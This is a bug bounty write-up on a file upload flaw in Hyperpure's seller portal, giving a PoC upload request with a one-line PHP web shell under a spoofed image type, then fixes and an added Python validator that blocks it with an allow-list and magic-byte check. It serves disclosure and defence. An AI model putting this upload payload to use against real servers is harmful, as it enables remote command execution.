
🐞 Zomato File Upload Flaw: A Closer Look at the Security Oversight

⏱ 5 mins  📅 Jul 31, 2025, 02:00 PM

Improper File Upload Validation Leads to Remote Code Execution (RCE) & Stored XSS on seller.hyperpure.com

📌 Summary

During a security assessment of the Hyperpure Seller Hub, I discovered a critical vulnerability in the file upload mechanism at /public/api/seller_hub/logout/document. The backend does not properly validate file extensions or MIME types: it trusts the client-supplied filename and Content-Type header, so files such as .php and .js can be uploaded.

Although these files are stored in an S3 bucket, they are publicly accessible. S3 itself serves objects as static content, so the PHP payload executes only if the same path is also served through an application host (Apache/Nginx with a PHP handler) from an app subdomain; where that is the case, the result is RCE. Even without server-side execution, an uploaded .js file served from a trusted origin enables Stored XSS.

🧪 Steps to Reproduce (PoC)

  1. Register as a seller at https://seller.hyperpure.com
  2. Go to the document upload section.
  3. Intercept the document-upload POST request and modify it as follows (filename set to shell.php, Content-Type spoofed as image/png):
POST /public/api/seller_hub/logout/document HTTP/1.1
Host: seller.hyperpure.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

PHP Payload:

<?php system($_GET['cmd']); ?>

The uploaded file will be accessible at:

https://prodhpadmin.zomans.com/data/f.../{uploaded_file}.php

Then request the same path on the application domain, where a PHP handler could execute it:

https://seller.hyperpure.com/data/.../{uploaded_file}.php

🛠 Impact

  • RCE: server-side command execution if the uploaded .php file is served through a host with a PHP handler.
  • Stored XSS: JavaScript injection into dashboards that load the uploaded file.
  • Persistence: uploaded files remain publicly accessible.
  • MIME bypass: the only filter is the client-supplied Content-Type header, which is trivially spoofed.

⚠️ Severity: Critical (CVSS: 9.8 - 10.0)

  • Affects all seller accounts.
  • Allows full remote server control or XSS attacks.
  • No strong file type validation on backend.
  • Files hosted on public S3 without proper ACL rules.

🧩 Suggested Fix

  • Validate file extension and MIME type server-side: check the file's magic bytes rather than trusting the client-supplied Content-Type header, and reject any mismatch.
  • Reject executable and scriptable types (.php, .phtml, .js, .html, .svg, etc.), including when hidden in a double extension such as report.php.pdf.
  • Store uploads under a server-generated random key, outside the web root or in a private bucket reachable only through short-lived signed URLs.
  • Serve downloads with a fixed Content-Type, Content-Disposition: attachment and X-Content-Type-Options: nosniff so the browser never renders them as a page.
  • Apply a strict Content Security Policy (CSP) to the dashboard.
  • Whitelist only the formats the feature needs: .pdf, .csv, .xlsx.
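The following is an added example, not code from the original write-up or from Hyperpure/Zomato. It parses the PoC multipart request shown above and runs it through two server-side checks: a naive one that trusts the client's Content-Type header (and therefore accepts shell.php), and a hardened one implementing the fixes listed above (extension allow-list, magic-byte check, filename normalisation, random storage key, fixed serve type), which rejects it. The boundary, form field name, sample file bytes and the allow-list contents are assumptions constructed for the demo; .csv is left out because it has no magic bytes and needs a structural check of its own.

```python
"""Added example: vulnerable vs. hardened upload validation (not Hyperpure's code)."""
import os
import re
import secrets
from dataclasses import dataclass
from typing import Optional

BOUNDARY = b"----WebKitFormBoundary"  # assumed, as in the PoC request


def build_body(filename: str, declared_type: str, data: bytes) -> bytes:
    """Build a single-file multipart/form-data body shaped like the PoC request."""
    return (
        b"--" + BOUNDARY + b"\r\n"
        + f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'.encode()
        + f"Content-Type: {declared_type}\r\n\r\n".encode()
        + data + b"\r\n"
        + b"--" + BOUNDARY + b"--\r\n"
    )


# The write-up's PoC: PHP source uploaded under a spoofed image/png type (constructed).
POC_BODY = build_body("shell.php", "image/png", b"<?php system($_GET['cmd']); ?>")


@dataclass
class UploadPart:
    filename: str
    declared_type: str
    data: bytes


def parse_multipart(body: bytes, boundary: bytes = BOUNDARY) -> list:
    """Tiny parser for single-file uploads; enough for the demo, not RFC 7578-complete."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, data = chunk[2:].partition(b"\r\n\r\n")   # chunk starts with CRLF
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if m:
            parts.append(UploadPart(m.group(1), headers.get("content-type", ""),
                                    data.removesuffix(b"\r\n")))
    return parts


# --- Vulnerable check: the client chooses the Content-Type, so it proves nothing. ---
ALLOWED_CLIENT_TYPES = {"image/png", "image/jpeg", "application/pdf"}


def naive_is_allowed(part: UploadPart) -> bool:
    return part.declared_type in ALLOWED_CLIENT_TYPES


# --- Hardened check: extension allow-list -> (type to serve as, magic-byte prefixes). ---
ALLOWED = {
    ".pdf":  ("application/pdf", (b"%PDF-",)),
    ".png":  ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ".jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    ".jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".xlsx": ("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
              (b"PK\x03\x04",)),
}
# Never allowed anywhere in the name: Apache-style multi-extension handling may act on them.
SCRIPT_EXTS = {"php", "phtml", "php5", "phar", "js", "html", "htm", "shtml", "svg"}


@dataclass
class Decision:
    accepted: bool
    reason: str
    storage_key: Optional[str] = None   # server-generated; the client name is never reused
    serve_type: Optional[str] = None    # fixed Content-Type to serve the object with


def hardened_check(part: UploadPart) -> Decision:
    """Server-side validation that does not trust the client's filename or Content-Type."""
    name = os.path.basename(part.filename.replace("\\", "/"))   # drop path components
    if not name or "\x00" in name:
        return Decision(False, "empty filename or NUL byte")
    segments = name.lower().split(".")
    ext = "." + segments[-1] if len(segments) > 1 else ""
    if ext not in ALLOWED:
        return Decision(False, f"extension {ext!r} not in allow-list")
    if any(seg in SCRIPT_EXTS for seg in segments[1:-1]):
        return Decision(False, "script extension hidden inside filename")
    serve_type, magics = ALLOWED[ext]
    if part.declared_type.lower() != serve_type:
        return Decision(False, "declared Content-Type does not match extension")
    if not any(part.data.startswith(m) for m in magics):
        return Decision(False, "file content does not match declared type")
    return Decision(True, "ok", f"{secrets.token_hex(16)}{ext}", serve_type)


if __name__ == "__main__":
    poc = parse_multipart(POC_BODY)[0]
    print("naive accepts shell.php:", naive_is_allowed(poc))      # True
    print("hardened verdict:", hardened_check(poc))               # rejected
```

The magic-byte check is what closes the PoC: the PHP source begins with `<?php`, not with any signature in the allow-list, so spoofing `image/png` no longer helps. Generating the storage key server-side also removes path traversal and double-extension tricks from the storage path entirely; the name checks remain as defence in depth.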

📣 Tags

#BugBounty #Security #RemoteCodeExecution #StoredXSS #Zomato #Hyperpure #Critical #EthicalHacking #FileUploadVulnerability #WebSecurity #ZeroDay

🎥 Video Explanation